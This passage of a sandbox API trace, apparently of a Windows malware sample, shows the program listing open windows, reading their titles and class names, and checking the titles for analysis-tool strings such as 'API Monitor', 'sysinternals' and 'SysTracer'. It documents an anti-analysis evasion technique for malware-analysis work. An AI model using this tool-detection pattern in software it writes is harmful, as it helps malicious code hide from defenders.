lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.698] GetWindowTextA (in: hWnd=0x100cc, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.698] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.698] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.698] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.698] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65740") returned 5 [0158.698] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.698] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.699] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.699] GetClassNameA (in: hWnd=0x100cc, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.699] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.699] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.699] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.699] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65740") returned 5 [0158.699] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.699] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.699] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.699] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.699] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.699] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.699] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.699] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.699] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.699] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.700] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.700] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.700] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.700] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.700] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.700] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.700] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.700] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.700] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.700] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.700] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.700] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.700] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.700] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.701] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.701] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.701] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="327868") returned 6 [0158.701] lstrcpyA (in: lpString1=0x430400, lpString2="327868" | out: lpString1="327868") returned="327868" [0158.701] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.701] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.701] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.701] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.701] GetWindowTextA (in: hWnd=0x500bc, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.701] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.701] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.701] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.701] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="327868") returned 6 [0158.701] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.701] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.701] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.702] GetClassNameA (in: hWnd=0x500bc, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.702] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.702] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.702] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.702] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="327868") returned 6 [0158.702] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.702] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.702] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.702] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.702] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.702] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.702] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.702] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.702] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.702] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.703] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.703] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.703] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.703] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.703] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.703] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.703] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.703] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.703] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.703] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.703] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.703] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.703] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.703] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.703] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.704] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.704] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65716") returned 5 [0158.704] lstrcpyA (in: lpString1=0x430400, lpString2="65716" | out: lpString1="65716") returned="65716" [0158.704] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.704] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.704] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.704] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.704] GetWindowTextA (in: hWnd=0x100b4, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.704] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.704] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.704] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.704] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65716") returned 5 [0158.704] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.704] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.704] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.705] GetClassNameA (in: hWnd=0x100b4, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0158.705] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.705] lstrcpynA (in: lpString1=0x341200, lpString2="TaskListThumbnailWnd", iMaxLength=1024 | out: lpString1="TaskListThumbnailWnd") returned="TaskListThumbnailWnd" [0158.705] lstrcpyA (in: lpString1=0x430c00, lpString2="TaskListThumbnailWnd" | out: lpString1="TaskListThumbnailWnd") returned="TaskListThumbnailWnd" [0158.705] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65716") returned 5 [0158.705] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.705] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.705] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.705] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.705] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.705] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.705] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.705] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.705] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.706] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.706] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.706] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.706] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.706] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.706] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.706] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.706] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.706] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.706] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.706] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.706] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.707] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.707] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.707] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.707] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.707] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.707] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65732") returned 5 [0158.707] lstrcpyA (in: lpString1=0x430400, lpString2="65732" | out: lpString1="65732") returned="65732" [0158.707] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.707] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.707] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.707] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.707] GetWindowTextA (in: hWnd=0x100c4, lpString=0x340df8, nMaxCount=1024 | out: lpString="aDU0VK IWA5kLS") returned 14 [0158.707] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.707] lstrcpynA (in: lpString1=0x3401e0, lpString2="aDU0VK IWA5kLS", iMaxLength=1024 | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0158.708] lstrcpyA (in: lpString1=0x430800, lpString2="aDU0VK IWA5kLS" | out: lpString1="aDU0VK IWA5kLS") returned="aDU0VK IWA5kLS" [0158.708] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65732") returned 5 [0158.708] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.708] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.708] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.708] GetClassNameA (in: hWnd=0x100c4, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="Desktop User Picture") returned 20 [0158.708] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.708] lstrcpynA (in: lpString1=0x341200, lpString2="Desktop User Picture", iMaxLength=1024 | out: lpString1="Desktop User Picture") returned="Desktop User Picture" [0158.708] lstrcpyA (in: lpString1=0x430c00, lpString2="Desktop User Picture" | out: lpString1="Desktop User Picture") returned="Desktop User Picture" [0158.708] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65732") returned 5 [0158.708] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.708] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.708] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.708] strstr (_Str="aDU0VK IWA5kLS", _SubStr="- main thread") returned 0x0 [0158.709] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.709] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.709] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.709] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.709] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.709] strstr (_Str="aDU0VK IWA5kLS", _SubStr="API Monitor") returned 0x0 [0158.709] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.709] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.709] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.709] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.709] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.709] strstr (_Str="aDU0VK IWA5kLS", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.709] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.709] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.710] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.710] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.710] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.710] strstr (_Str="aDU0VK IWA5kLS", _SubStr="sysinternals") returned 0x0 [0158.710] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.710] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.710] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.710] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.710] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131558") returned 6 [0158.710] lstrcpyA (in: lpString1=0x430400, lpString2="131558" | out: lpString1="131558") returned="131558" [0158.710] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.710] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.710] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.710] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.711] GetWindowTextA (in: hWnd=0x201e6, lpString=0x3401e0, nMaxCount=1024 | out: lpString="Book1 - Excel") returned 13 [0158.711] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.711] lstrcpynA (in: lpString1=0x340df8, lpString2="Book1 - Excel", iMaxLength=1024 | out: lpString1="Book1 - Excel") returned="Book1 - Excel" [0158.711] lstrcpyA (in: lpString1=0x430800, lpString2="Book1 - Excel" | out: lpString1="Book1 - Excel") returned="Book1 - Excel" [0158.711] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131558") returned 6 [0158.711] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.711] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.711] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.711] GetClassNameA (in: hWnd=0x201e6, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="XLMAIN") returned 6 [0158.711] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.711] lstrcpynA (in: lpString1=0x341200, lpString2="XLMAIN", iMaxLength=1024 | out: lpString1="XLMAIN") returned="XLMAIN" [0158.712] lstrcpyA (in: lpString1=0x430c00, lpString2="XLMAIN" | out: lpString1="XLMAIN") returned="XLMAIN" [0158.712] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131558") returned 6 [0158.712] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.712] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.712] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.712] strstr (_Str="Book1 - Excel", _SubStr="- main thread") returned 0x0 [0158.712] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.712] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.712] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.712] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.712] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.712] strstr (_Str="Book1 - Excel", _SubStr="API Monitor") returned 0x0 [0158.712] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.712] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.713] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.713] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.713] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.713] strstr (_Str="Book1 - Excel", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.713] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.713] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.719] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.719] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.719] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.719] strstr (_Str="Book1 - Excel", _SubStr="sysinternals") returned 0x0 [0158.719] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.719] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.720] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.720] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.720] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="66178") returned 5 [0158.720] lstrcpyA (in: lpString1=0x430400, lpString2="66178" | out: lpString1="66178") returned="66178" [0158.720] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.720] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.720] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.720] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.720] GetWindowTextA (in: hWnd=0x10282, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.720] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.720] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.720] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.720] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="66178") returned 5 [0158.720] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.720] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.721] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.721] GetClassNameA (in: hWnd=0x10282, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0158.721] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.721] lstrcpynA (in: lpString1=0x341200, lpString2="WorkerW", iMaxLength=1024 | out: lpString1="WorkerW") returned="WorkerW" [0158.721] lstrcpyA (in: lpString1=0x430c00, lpString2="WorkerW" | out: lpString1="WorkerW") returned="WorkerW" [0158.721] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="66178") returned 5 [0158.721] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.721] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.721] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.721] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.721] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.721] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.721] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.721] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.721] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.722] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.722] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.722] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.722] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.722] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.722] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.722] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.722] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.722] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.722] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.722] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.722] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.722] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.722] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.722] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.723] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.723] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.723] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131618") returned 6 [0158.723] lstrcpyA (in: lpString1=0x430400, lpString2="131618" | out: lpString1="131618") returned="131618" [0158.723] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.723] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.723] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.723] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.723] GetWindowTextA (in: hWnd=0x20222, lpString=0x3401e0, nMaxCount=1024 | out: lpString="C") returned 1 [0158.723] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.723] lstrcpynA (in: lpString1=0x340df8, lpString2="C", iMaxLength=1024 | out: lpString1="C") returned="C" [0158.723] lstrcpyA (in: lpString1=0x430800, lpString2="C" | out: lpString1="C") returned="C" [0158.723] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131618") returned 6 [0158.723] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.723] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.724] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.724] GetClassNameA (in: hWnd=0x20222, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="CFD File Open Message Window") returned 28 [0158.724] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.724] 